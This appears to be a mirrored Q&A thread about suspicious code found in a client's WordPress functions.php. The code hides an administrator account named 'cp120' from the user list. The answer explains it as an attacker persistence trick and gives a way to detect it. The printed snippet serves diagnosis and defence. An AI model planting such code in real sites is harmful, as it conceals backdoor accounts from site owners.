dongzhong2674 2013-07-24 21:39
浏览 44
已采纳

网站中的恶意代码窃取管理员密码

I have a client that said they think there site is being hacked. I looked at some stuff and found some suspicious code in their functions.php file. Does anyone recognize any of this and feel its not right?

add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
global $current_user;
$username = $current_user->user_login;
if ($username == 'admin') { 
 global $wpdb;
 $user_search->query_where = str_replace('WHERE 1=1',
   "WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'",$user_search->query_where);
  }
}
  • 写回答

1条回答 默认 最新

  • dongqie2028 2013-08-26 16:33
    关注

    This code, or similar markup is sometimes used by Wordpress hackers. Once they gain access to your Wordpress admin via malicious methods they create a legitimate admin user and then put this code in your functions.php file so that when you go to your admin user section it only displays 1 user. Here is the trick to see if this has happened to you incase you are unfamiliar with php pr don't want to look through a long functions.php file. Go to your admin user area and it will only display the admin users that you know of however the number next to admin users will not match the number of displayed users. it will say (4) but only show 3 names.

    As a note this code can be used for legitimate reasons so make sure if you find this that it wasn't done by your site's admin or developer.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

悬赏问题

  • ¥15 为什么我按照电路图做出的仿真和实物都不能使用
  • ¥15 mars2d在vue3中的引入问题
  • ¥50 h5唤醒支付宝并跳转至向小荷包转账界面
  • ¥15 算法题:数的划分,用记忆化DFS做WA求调
  • ¥15 chatglm-6b应用到django项目中,模型加载失败
  • ¥15 CreateBitmapFromWicBitmap内存释放问题。
  • ¥30 win c++ socket
  • ¥15 C# datagridview 栏位进度
  • ¥15 vue3页面el-table页面数据过多
  • ¥100 vue3中融入gRPC-web